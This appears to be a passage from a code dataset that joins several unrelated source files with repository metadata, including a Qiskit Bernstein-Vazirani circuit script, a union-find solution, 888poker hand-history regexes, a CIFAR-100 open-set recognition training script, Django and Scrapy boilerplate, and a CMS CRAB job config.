prog.cx(input_qubit[0],input_qubit[2]) # number=31
prog.cx(input_qubit[0],input_qubit[2]) # number=34
prog.x(input_qubit[2]) # number=35
prog.cx(input_qubit[0],input_qubit[2]) # number=36
prog.cx(input_qubit[0],input_qubit[2]) # number=33
prog.h(input_qubit[2]) # number=25
prog.cz(input_qubit[0],input_qubit[2]) # number=26
prog.h(input_qubit[2]) # number=27
prog.h(input_qubit[1]) # number=7
prog.cz(input_qubit[2],input_qubit[1]) # number=8
prog.rx(-0.3989822670059037,input_qubit[1]) # number=30
prog.h(input_qubit[1]) # number=9
prog.h(input_qubit[1]) # number=18
prog.cz(input_qubit[2],input_qubit[1]) # number=19
prog.h(input_qubit[1]) # number=20
prog.y(input_qubit[1]) # number=14
prog.h(input_qubit[1]) # number=22
prog.cz(input_qubit[2],input_qubit[1]) # number=23
prog.h(input_qubit[1]) # number=24
prog.z(input_qubit[2]) # number=3
prog.x(input_qubit[1]) # number=17
prog.y(input_qubit[2]) # number=5
prog.x(input_qubit[2]) # number=21
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[n])
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [input_qubit[n]])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
return prog
def get_statevector(prog: QuantumCircuit) -> Any:
state_backend = Aer.get_backend('statevector_simulator')
statevec = execute(prog, state_backend).result()
quantum_state = statevec.get_statevector()
qubits = round(log2(len(quantum_state)))
quantum_state = {
"|" + np.binary_repr(i, qubits) + ">": quantum_state[i]
for i in range(2 ** qubits)
}
return quantum_state
def evaluate(backend_str: str, prog: QuantumCircuit, shots: int, b: str) -> Any:
# Q: which backend should we use?
# get state vector
quantum_state = get_statevector(prog)
# get simulate results
# provider = IBMQ.load_account()
# backend = provider.get_backend(backend_str)
# qobj = compile(prog, backend, shots)
# job = backend.run(qobj)
# job.result()
backend = Aer.get_backend(backend_str)
# transpile/schedule -> assemble -> backend.run
results = execute(prog, backend, shots=shots).result()
counts = results.get_counts()
a = Counter(counts).most_common(1)[0][0][::-1]
return {
"measurements": counts,
# "state": statevec,
"quantum_state": quantum_state,
"a": a,
"b": b
}
def bernstein_test_1(rep: str):
"""011 . x + 1"""
a = "011"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_2(rep: str):
"""000 . x + 0"""
a = "000"
b = "0"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_3(rep: str):
"""111 . x + 1"""
a = "111"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
if __name__ == "__main__":
n = 2
a = "11"
b = "1"
f = lambda rep: \
bitwise_xor(bitwise_dot(a, rep), b)
prog = build_circuit(n, f)
sample_shot =4000
writefile = open("../data/startQiskit_QC200.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_5_yorktown")
circuit1 = transpile(prog, FakeYorktown())
circuit1.h(qubit=2)
circuit1.x(qubit=3)
circuit1.measure_all()
info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| [
"[email protected]"
] | |
76eb0ff4bccebf9ef628e4a625ec26945dffb10d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02573/s607211232.py | a15ccc098a97d0f2076b85071f021635d77845ac | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 735 | py | class UnionFind:
def __init__(self, n):
self.r = [-1] * n
def root(self, x):
if self.r[x] < 0:
return x
self.r[x] = self.root(self.r[x])
return self.r[x]
def merge(self, x, y):
x, y = self.root(x), self.root(y)
if x == y:
return False
if self.r[x] > self.r[y]:
x, y = y, x
self.r[x] += self.r[y]
self.r[y] = x
return True
def size(self, x):
return -self.r[self.root(x)]
N, M = map(int, input().split())
f, uf = [set() for i in range(N)], UnionFind(N)
for _ in range(M):
A, B = map(lambda x: int(x)-1, input().split())
uf.merge(A, B)
print(max([uf.size(i) for i in range(N)]))
| [
"[email protected]"
] | |
762b1c64e435700c7347877040a1ae4aaaaabfe8 | f51a03fee097195911c1577e8510908d02784853 | /src/data/reg_ex/poker_888.py | 9df00e106415573e9384ed7598704598977a71a5 | [] | no_license | aaaaaa2493/poker-engine | fc04cc4b93ad73189adf99b2f864d12a99a34dce | 52aebf8572f87378fa78c999c252d60fcc80f5ce | refs/heads/master | 2020-08-31T17:38:28.477260 | 2019-10-31T12:16:40 | 2019-10-31T12:16:40 | 218,746,090 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,701 | py | from re import compile
class Poker888:
name = '[a-zA-Z0-9_\-@\'.,$*`áàåäãçéèêíîóöôõšüúžÄÁÃÅÉÍÖÔÓÜØø´<^>+&' \
'\\\/()Ѐ£¼ñ®™~#!%\[\]|°¿?:"=ß{}æ©«»¯²¡; ]+'
identifier = compile('^\*\*\*\*\* 888poker Hand History')
identifier_snap = compile('^Snap Poker Hand History')
hand_border = compile('^$')
hand_border_888 = compile(r'\*\*\*\*\* 888poker Hand History for ')
hand_border_snap = compile(r'Snap Poker Hand History for ')
find_hand_id = compile(r'^Game ([0-9]+) \*\*\*\*\*$')
step_border = compile(r'\*\* [DSa-z ]+ \*\*')
blinds_and_date = compile(r'^\$([0-9,]+)/\$([0-9,]+) Blinds No Limit Holdem - \*\*\* '
r'(.. .. ....) ([0-9:]+)$')
blinds_and_ante_2 = compile(r'^([0-9 ]+) \$/([0-9 ]+) \$ Blinds No Limit Holdem - \*\*\* '
r'(.. .. ....) ([0-9:]+)$')
game_info = compile(r'^Tournament #([0-9]+) (\$[0-9.]+ \+ \$[0-9.]+) - '
r'Table #([0-9]+) ([0-9]+) Max \(Real Money\)$')
game_info_2 = compile(r'^Tournament #([0-9]+) ([0-9,]+ \$ \+ [0-9,]+ \$) - '
r'Table #([0-9]+) ([0-9]+) Max \(Real Money\)$')
game_info_3 = compile(r'^Tournament #([0-9]+) (\$[0-9.]+) - '
r'Table #([0-9]+) ([0-9]+) Max \(Real Money\)$')
game_info_4 = compile(r'^Tournament #([0-9]+) ([0-9,]+ \$) - '
r'Table #([0-9]+) ([0-9]+) Max \(Real Money\)$')
game_info_5 = compile(r'^Tournament #([0-9]+) (Бесплатно) - '
r'Table #([0-9]+) ([0-9]+) Max \(Real Money\)$')
find_button_seat = compile(r'^Seat ([0-9]+) is the button$')
player_init = compile(r'^Seat ([0-9]+): (' + name + r') \( \$([0-9,]+) \)$')
player_init_2 = compile(r'^Seat ([0-9]+): (' + name + r') \( ([0-9 ]+) \$ \)$')
empty_init = compile(r'^Seat ([0-9]+):[ ]{2}\( ([0-9,$ ]+) \)$')
find_ante = compile(r'^(' + name + r') posts ante \[\$([0-9,]+)\]$')
find_ante_2 = compile(r'^(' + name + r') posts ante \[([0-9 ]+) \$\]$')
find_small_blind = compile(r'^(' + name + ') posts small blind \[\$([0-9,]+)\]$')
find_small_blind_2 = compile(r'^(' + name + r') posts small blind \[([0-9 ]+) \$\]$')
find_big_blind = compile(r'^(' + name + ') posts big blind \[\$([0-9,]+)\]$')
find_big_blind_2 = compile(r'^(' + name + r') posts big blind \[([0-9 ]+) \$\]$')
find_flop = compile(r'^\[ (..), (..), (..) \]$')
find_turn = compile(r'^\[ (..) \]$')
find_river = compile(r'^\[ (..) \]$')
skip_total_number_of_players = compile(r'^Total number of players : [0-9]+$')
# actions
find_dealt_cards = compile(r'^Dealt to (' + name + ') \[ (..), (..) \]$')
find_fold = compile(r'^(' + name + ') folds$')
find_call = compile(r'^(' + name + ') calls \[\$([0-9,]+)\]$')
find_call_2 = compile(r'^(' + name + r') calls \[([0-9 ]+) \$\]$')
find_check = compile(r'^(' + name + ') checks$')
find_bet = compile(r'^(' + name + ') bets \[\$([0-9,]+)\]$')
find_bet_2 = compile(r'^(' + name + r') bets \[([0-9 ]+) \$\]$')
find_raise = compile(r'^(' + name + ') raises \[\$([0-9,]+)\]$')
find_raise_2 = compile(r'^(' + name + ') raises \[([0-9 ]+) \$\]$')
find_did_not_show = compile(r'^(' + name + r') did not show his hand$')
find_win_money = compile(r'^(' + name + ') collected \[ \$([0-9,]+) \]$')
find_win_money_2 = compile(r'^(' + name + r') collected \[ ([0-9 ]+) \$ \]$')
find_show_cards = compile(r'^(' + name + ') shows \[ (..), (..) \]$')
find_muck_cards = compile(r'^(' + name + ') mucks \[ (..), (..) \]$')
| [
"[email protected]"
] | |
992d9b74e952ecd7516429a0554f8e5e86d3a855 | 6f594cc963795c69d8da3c30ca580c0405ef2d6e | /other/57InsertInterval.py | d1fb32163788f8998b4a82b8be2a45e9a2d0316a | [] | no_license | lo-tp/leetcode | 25933c5b25f64f881d43748d8b2763f69614a97f | 4cc4d76c64e9d9aa3f53c5e9574e488c93e10a50 | refs/heads/master | 2022-09-07T20:32:58.487759 | 2022-09-05T03:39:50 | 2022-09-07T13:39:50 | 116,555,892 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | class Solution(object):
def insert(self, intervals, newInterval):
res = []
if intervals:
start, end = newInterval
for s, e in intervals:
if start != -1:
# 1
if e < start:
res.append([s, e])
# 2
elif end < s:
res.append([start, end])
res.append([s, e])
start = -1
else:
start, end = min(start, s), max(end, e)
else:
res.append([s, e])
if start != -1:
res.append([start, end])
else:
res.append(newInterval)
return res
| [
"[email protected]"
] | |
e31c2e26ec440d62747103a26caeb3e97c34bdc3 | 2da6b95fe4237cc00014f80c45d268ab62fc90cd | /OSR/DFP_end3/cifar100.py | ce07f74fad4fe9ce0e53a4f74e28977d3e9bb80e | [] | no_license | lvzongyao/Open-Set-Recognition-1 | 7e26cd1d97f67b6c075f4e64296ce7a82d479168 | 26a8a1cca199f4e23df98abca6893e3eef3307da | refs/heads/master | 2023-08-19T09:15:16.119377 | 2021-09-13T04:21:18 | 2021-09-13T04:21:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,458 | py | from __future__ import print_function
import torch
import torch.nn as nn
import math
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import numpy as np
import torchvision.transforms as transforms
import os
import argparse
import sys
# from models import *
sys.path.append("../..")
import backbones.cifar as models
from datasets import CIFAR100
from Utils import adjust_learning_rate, progress_bar, Logger, mkdir_p, Evaluation
from DFPLoss import DFPLoss, DFPLoss2
from DFPNet import DFPNet
from MyPlotter import plot_feature, plot_distance,plot_gap
from helper import get_gap_stat
model_names = sorted(name for name in models.__dict__
if not name.startswith("__")
and callable(models.__dict__[name]))
os.environ["HDF5_USE_FILE_LOCKING"] = "FALSE"
# os.environ["CUDA_VISIBLE_DEVICES"] = "0,1,2,3"
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
# Dataset preperation
parser.add_argument('--train_class_num', default=50, type=int, help='Classes used in training')
parser.add_argument('--test_class_num', default=100, type=int, help='Classes used in testing')
parser.add_argument('--includes_all_train_class', default=True, action='store_true',
help='If required all known classes included in testing')
# Others
parser.add_argument('--bs', default=256, type=int, help='batch size')
parser.add_argument('--evaluate', action='store_true', help='Evaluate without training')
# General MODEL parameters
parser.add_argument('--arch', default='ResNet18', choices=model_names, type=str, help='choosing network')
parser.add_argument('--embed_dim', default=512, type=int, help='embedding feature dimension')
parser.add_argument('--distance', default='l2', choices=['l2', 'l1', 'cosine', 'dotproduct'],
type=str, help='choosing distance metric')
parser.add_argument('--similarity', default='dotproduct', choices=['l2', 'l1', 'cosine', 'dotproduct'],
type=str, help='choosing distance metric')
parser.add_argument('--alpha', default=1.0, type=float, help='weight of distance loss')
parser.add_argument('--beta', default=1.0, type=float, help='weight of center between loss')
parser.add_argument('--theta', default=10.0, type=float, help='slope for input data distance within/out thresholds,'
'default 10.')
parser.add_argument('--sim_threshold', default=0.9, type=float, help='.')
parser.add_argument('--amplier', default=0.9, type=float, help='.')
parser.add_argument('--scaled', default='True', action='store_true',
help='If scale distance by sqrt(embed_dim)')
parser.add_argument('--norm_centroid', action='store_true', help='Normalize the centroid using L2-normailization')
parser.add_argument('--decorrelation', action='store_true', help='Normalize the centroid using L2-normailization')
# Parameters for stage 1
parser.add_argument('--stage1_resume', default='', type=str, metavar='PATH', help='path to latest checkpoint')
parser.add_argument('--stage1_es', default=50, type=int, help='epoch size')
parser.add_argument('--stage1_lr', default=0.1, type=float, help='learning rate') # works for MNIST
# Parameters for stage 2
parser.add_argument('--stage2_resume',default='', type=str, metavar='PATH', help='path to latest checkpoint')
parser.add_argument('--stage2_es', default=50, type=int, help='epoch size')
parser.add_argument('--stage2_lr', default=0.01, type=float, help='learning rate') # works for MNIST
# Parameters for stage plotting
parser.add_argument('--plot', action='store_true', help='Plotting the training set.')
parser.add_argument('--plot_max', default=0, type=int, help='max examples to plot in each class, 0 indicates all.')
parser.add_argument('--plot_quality', default=200, type=int, help='DPI of plot figure')
parser.add_argument('--bins', default=50, type=int, help='divided into n bins')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
args.checkpoint = './checkpoints/cifar/' + \
'/%s-%s_%s_%s-%s-%s_%s_%s' % (args.train_class_num, args.test_class_num, args.arch, args.alpha,
args.beta, args.theta, args.embed_dim, str(args.decorrelation))
if not os.path.isdir(args.checkpoint):
mkdir_p(args.checkpoint)
# folder to save figures
args.plotfolder1 = os.path.join(args.checkpoint, "plotter_Stage1")
if not os.path.isdir(args.plotfolder1):
mkdir_p(args.plotfolder1)
# folder to save figures
args.plotfolder2 = os.path.join(args.checkpoint, "plotter_Stage2")
if not os.path.isdir(args.plotfolder2):
mkdir_p(args.plotfolder2)
print('==> Preparing data..')
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = CIFAR100(root='../../data', train=True, download=True, transform=transform_train,
train_class_num=args.train_class_num, test_class_num=args.test_class_num,
includes_all_train_class=args.includes_all_train_class)
testset = CIFAR100(root='../../data', train=False, download=True, transform=transform_test,
train_class_num=args.train_class_num, test_class_num=args.test_class_num,
includes_all_train_class=args.includes_all_train_class)
# data loader
trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.bs, shuffle=True, num_workers=4)
testloader = torch.utils.data.DataLoader(testset, batch_size=args.bs, shuffle=False, num_workers=4)
def main():
print(device)
stage1_dict = {
'distance': {'thresholds': torch.ones(args.train_class_num)},
'stat': None,
'net': None
}
if not args.evaluate and not os.path.isfile(args.stage2_resume):
stage1_dict = main_stage1()
main_stage2(stage1_dict)
# centroids = cal_centroids(net1, device)
# main_stage2(net1, centroids)
def main_stage1():
print(f"\nStart Stage-1 training ...\n")
# for initializing backbone, two branches, and centroids.
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
# Model
print('==> Building model..')
net = DFPNet(backbone=args.arch, num_classes=args.train_class_num, embed_dim=args.embed_dim,
distance=args.distance, similarity=args.similarity, scaled=args.scaled,
norm_centroid=args.norm_centroid, decorrelation=args.decorrelation)
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
if args.stage1_resume:
# Load checkpoint.
if os.path.isfile(args.stage1_resume):
print('==> Resuming from checkpoint..')
checkpoint = torch.load(args.stage1_resume)
net.load_state_dict(checkpoint['net'])
start_epoch = checkpoint['epoch']
logger = Logger(os.path.join(args.checkpoint, 'log_stage1.txt'), resume=True)
else:
print("=> no checkpoint found at '{}'".format(args.resume))
else:
logger = Logger(os.path.join(args.checkpoint, 'log_stage1.txt'))
logger.set_names(['Epoch', 'Train Loss', 'Similarity Loss', 'Distance Loss', 'Train Acc.'])
# after resume
criterion = DFPLoss(alpha=args.alpha)
optimizer = optim.SGD(net.parameters(), lr=args.stage1_lr, momentum=0.9, weight_decay=5e-4)
for epoch in range(start_epoch, args.stage1_es):
adjust_learning_rate(optimizer, epoch, args.stage1_lr, step=20)
print('\nStage_1 Epoch: %d | Learning rate: %f ' % (epoch + 1, optimizer.param_groups[0]['lr']))
train_out = stage1_train(net, trainloader, optimizer, criterion, device)
save_model(net, epoch, os.path.join(args.checkpoint, 'stage_1_last_model.pth'))
logger.append([epoch + 1, train_out["train_loss"], train_out["loss_similarity"],
train_out["loss_distance"], train_out["accuracy"]])
# calculating distances for last epoch
distance_results = plot_distance(net, trainloader, device, args)
# print(f"the distance thresholds are\n {distance_results['thresholds']}\n")
# gap_results = plot_gap(net, trainloader, device, args)
# stat = get_gap_stat(net, trainloader, device, args)
# estimator =CGD_estimator(gap_results)
logger.close()
print(f"\nFinish Stage-1 training...\n")
print("===> Evaluating ...")
stage1_test(net, testloader, device)
return {"net": net,
"distance": distance_results,
# "stat": stat
}
# Training
def stage1_train(net, trainloader, optimizer, criterion, device):
net.train()
train_loss = 0
loss_similarity = 0
loss_distance = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
out = net(inputs)
loss_dict = criterion(out, targets)
loss = loss_dict['total']
# loss = loss_dict['similarity']
# loss = loss_dict['distance']
loss.backward()
optimizer.step()
train_loss += loss.item()
loss_similarity += (loss_dict['similarity']).item()
loss_distance += (loss_dict['distance']).item()
_, predicted = (out['sim_fea2cen']).max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss / (batch_idx + 1), 100. * correct / total, correct, total))
return {
"train_loss": train_loss / (batch_idx + 1),
"loss_similarity": loss_similarity / (batch_idx + 1),
"loss_distance": loss_distance / (batch_idx + 1),
"accuracy": correct / total
}
def stage1_test(net, testloader, device):
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
out = net(inputs)
_, predicted = (out["sim_fea2cen"]).max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(testloader), '| Acc: %.3f%% (%d/%d)'
% (100. * correct / total, correct, total))
print("\nTesting results is {:.2f}%".format(100. * correct / total))
def main_stage2(stage1_dict):
print('==> Building stage2 model..')
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
net = DFPNet(backbone=args.arch, num_classes=args.train_class_num, embed_dim=args.embed_dim,
distance=args.distance, similarity=args.similarity, scaled=args.scaled,
norm_centroid=args.norm_centroid, decorrelation=args.decorrelation)
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
if not args.evaluate and not os.path.isfile(args.stage2_resume):
net = stage1_dict['net']
net = net.to(device)
thresholds = stage1_dict['distance']['thresholds']
# stat = stage1_dict["stat"]
net.module.set_threshold(thresholds.to(device))
if args.stage2_resume:
# Load checkpoint.
if os.path.isfile(args.stage2_resume):
print('==> Resuming from checkpoint..')
checkpoint = torch.load(args.stage2_resume)
net.load_state_dict(checkpoint['net'])
start_epoch = checkpoint['epoch']
try:
thresholds = checkpoint['net']['thresholds']
except:
thresholds = checkpoint['net']['module.thresholds']
net.module.set_threshold(thresholds.to(device))
logger = Logger(os.path.join(args.checkpoint, 'log_stage2.txt'), resume=True)
else:
print("=> no checkpoint found at '{}'".format(args.resume))
else:
logger = Logger(os.path.join(args.checkpoint, 'log_stage2.txt'))
logger.set_names(['Epoch', 'Train Loss', 'Similarity Loss', 'Distance in', 'Distance out',
'Distance Center', 'Train Acc.'])
if args.evaluate:
stage2_test(net, testloader, device)
return net
# after resume
criterion = DFPLoss2(alpha=args.alpha,beta=args.beta, theta=args.theta)
optimizer = optim.SGD(net.parameters(), lr=args.stage1_lr, momentum=0.9, weight_decay=5e-4)
for epoch in range(start_epoch, args.stage2_es):
print('\nStage_2 Epoch: %d Learning rate: %f' % (epoch + 1, optimizer.param_groups[0]['lr']))
# Here, I didn't set optimizers respectively, just for simplicity. Performance did not vary a lot.
adjust_learning_rate(optimizer, epoch, args.stage2_lr, step=20)
# if epoch %5 ==0:
# distance_results = plot_distance(net, trainloader, device, args)
# thresholds = distance_results['thresholds']
# net.module.set_threshold(thresholds.to(device))
train_out = stage2_train(net, trainloader, optimizer, criterion, device)
save_model(net, epoch, os.path.join(args.checkpoint, 'stage_2_last_model.pth'))
stage2_test(net, testloader, device)
# stat = get_gap_stat(net2, trainloader, device, args)
logger.append([epoch + 1, train_out["train_loss"], train_out["loss_similarity"],
train_out["distance_in"], train_out["distance_out"],
train_out["distance_center"], train_out["accuracy"]])
print(f"\nFinish Stage-2 training...\n")
logger.close()
stage2_test(net, testloader, device)
return net
def stage2_train(net2, trainloader, optimizer, criterion, device):
net2.train()
train_loss = 0
loss_similarity = 0
distance_in = 0
distance_out = 0
distance_center = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
out = net2(inputs)
loss_dict = criterion(out, targets)
loss = loss_dict['total']
# loss = loss_dict['similarity']
# loss = loss_dict['distance']
loss.backward()
optimizer.step()
train_loss += loss.item()
loss_similarity += (loss_dict['similarity']).item()
distance_in += (loss_dict['distance_in']).item()
distance_out += (loss_dict['distance_out']).item()
distance_center += (loss_dict['distance_center']).item()
_, predicted = (out['sim_fea2cen']).max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss / (batch_idx + 1), 100. * correct / total, correct, total))
return {
"train_loss": train_loss / (batch_idx + 1),
"loss_similarity": loss_similarity / (batch_idx + 1),
"distance_in": distance_in / (batch_idx + 1),
"distance_out": distance_out / (batch_idx + 1),
"distance_center": distance_center / (batch_idx + 1),
"accuracy": correct / total
}
def save_model(net, epoch, path, **kwargs):
state = {
'net': net.state_dict(),
'epoch': epoch,
}
for key, value in kwargs.items():
state[key] = value
torch.save(state, path)
def stage2_test(net, testloader, device):
sim_list, dis_list, target_list = [], [], []
threshold = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
out = net(inputs)
threshold = out["thresholds"] # [class]
sim_fea2cen= out["sim_fea2cen"] # [batch,class]
sim_fea2cen = torch.softmax(sim_fea2cen,dim=1) # [batch,class]
dis_fea2cen= out["dis_fea2cen"] # [batch,class]
sim_list.append(sim_fea2cen)
dis_list.append(dis_fea2cen)
target_list.append(targets)
progress_bar(batch_idx, len(testloader))
sim_list = torch.cat(sim_list,dim=0)
dis_list = torch.cat(dis_list,dim=0)
target_list = torch.cat(target_list, dim=0)
detail_evalate(sim_list, dis_list, target_list, threshold)
def detail_evalate(sim_list,dis_list,target_list, threshold):
predicts = []
labels = []
c = sim_list.shape[1]
# print(c)
for i in range(target_list.shape[0]):
sim, dis, target = sim_list[i], dis_list[i], target_list[i]
sim_value, sim_ind = sim.max(0)
dis_value, dis_ind = dis.min(0)
if sim_value < args.sim_threshold or dis_value >args.amplier*threshold[dis_ind]:
# if sim_value < args.sim_threshold:
predict = c
else:
predict = sim_ind.item()
predicts.append(predict)
labels.append(target.item())
# print(f"sim_value{sim_value}\t predict{predict}\t target{target}\t dis_value{dis_value}\t")
eval_result = Evaluation(predicts, labels,sim_list.tolist())
print(f"accuracy is %.3f" % (eval_result.accuracy))
print(f"F1 is %.3f" % (eval_result.f1_measure))
print(f"f1_macro is %.3f" % (eval_result.f1_macro))
print(f"f1_macro_weighted is %.3f" % (eval_result.f1_macro_weighted))
print(f"area_under_roc is %.3f" % (eval_result.area_under_roc))
# eval_result = Evaluation(pred_list, target_list, score_list)
#
# torch.save(eval_result, os.path.join(args.checkpoint, 'eval.pkl'))
#
# print(f"accuracy is %.3f" % (eval_result.accuracy))
# print(f"F1 is %.3f" % (eval_result.f1_measure))
# print(f"f1_macro is %.3f" % (eval_result.f1_macro))
# print(f"f1_macro_weighted is %.3f" % (eval_result.f1_macro_weighted))
# print(f"area_under_roc is %.3f" % (eval_result.area_under_roc))
# print(f"confuse matrix unkown is {eval_result.confusion_matrix[:,-1]}")
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
7e072a572581f6627fca07bcdcad06f5612d2500 | 44990e9f4630aa9efc8e0fa56f2c5dbd836cddc6 | /nao_vacila/wsgi.py | b4a7dcfe74eda774e16c8596df6bc9f14e247473 | [] | no_license | kallebefelipe/webserver-nao-vacila | 33c61461d73b7f9e649a93406eb032014f3b983c | 57e972a44a4eb68e5253d38d320051723d33a924 | refs/heads/master | 2022-12-14T19:18:22.670018 | 2017-09-06T13:00:02 | 2017-09-06T13:00:02 | 95,972,976 | 0 | 0 | null | 2022-12-07T23:58:58 | 2017-07-01T15:40:23 | Python | UTF-8 | Python | false | false | 489 | py | """
WSGI config for nao_vacila project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "nao_vacila.settings")
application = get_wsgi_application()
application = DjangoWhiteNoise(application)
| [
"[email protected]"
] | |
c2ea2cc2352bfd9d8b9ad888ff3c0fb82997b816 | 22954a0c13d7bf1824320802e802aa8166f16d76 | /web_scraping/rhiphopheads/items.py | ca9af6e29328930a755afe5a2a604dbaed917dd5 | [] | no_license | luke-zhu/cs1951a-data | e0c7a96c7e100c278722419ba3bc845f6a5326c4 | 925c3263988db1de815589c5e47ddd918c345b25 | refs/heads/master | 2021-01-20T07:40:21.372377 | 2017-05-02T21:47:08 | 2017-05-02T21:47:08 | 90,025,042 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class RhiphopheadsItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
| [
"[email protected]"
] | |
dc8835c6dec0140fcb1852faa09d8e70a7cdeaaf | c397d4899fbb5e34b90a2650be2e6aa6f5725972 | /blog/migrations/0037_reviewimage_thumbnail.py | 805c17f73adb43f3b5a343a908788a464aa1d064 | [] | no_license | CCCodes/ProConDuck | aa68e6e89c3c71ddf7832d35f51688fddc379b10 | c4ce19e62d5b50b3da9d258fa4e40831e159f2f7 | refs/heads/master | 2023-02-16T18:55:27.766465 | 2021-01-17T16:49:37 | 2021-01-17T16:49:37 | 96,048,162 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-23 00:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0036_auto_20170822_0803'),
]
operations = [
migrations.AddField(
model_name='reviewimage',
name='thumbnail',
field=models.BooleanField(default=False),
),
]
| [
"[email protected]"
] | |
a91390c161f40656d0f323b1525d55125c72c02a | 0b279c246179bc6a76ad17f055ad1dce3402b045 | /private_production/eft/2018/crab_INT_MINIAODSIM.py | e9a3be5b74809d1efea5713aa88eb353e315e3d7 | [] | no_license | UniMiBAnalyses/CMSSWGeneration | a55e6ad840e4f7f9fae6b46a4bb939a288492f10 | a7acf1a780eeb30e14616fef90ccf389e4367668 | refs/heads/master | 2023-09-01T02:01:44.746469 | 2022-01-31T11:01:29 | 2022-01-31T11:01:29 | 212,852,677 | 0 | 2 | null | 2022-06-16T15:23:25 | 2019-10-04T15:57:27 | Python | UTF-8 | Python | false | false | 838 | py | from CRABClient.UserUtilities import config, getUsernameFromSiteDB
config = config()
config.General.requestName = 'VBS_SSWW_INT_MINIAODSIM'
config.General.workArea = 'crab_projects'
config.General.transferOutputs = True
config.General.transferLogs = False
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'SMP-RunIIAutumn18MiniAOD-00048_1_cfg.py'
config.JobType.numCores = 4
config.JobType.maxMemoryMB = 6000
config.Data.inputDataset = '/Bulk/jixiao-VBS_SSWW_INT_Premix_2-7c74ac161ee1f5c5534fed7a9685e204/USER'
config.Data.inputDBS = 'phys03'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob = 1
config.Data.outLFNDirBase = '/store/user/%s/eft2018' % (getUsernameFromSiteDB())
config.Data.publication = True
config.Data.outputDatasetTag = 'VBS_SSWW_INT_MINIAODSIM'
config.Site.storageSite = 'T2_CN_Beijing'
| [
"[email protected]"
] | |
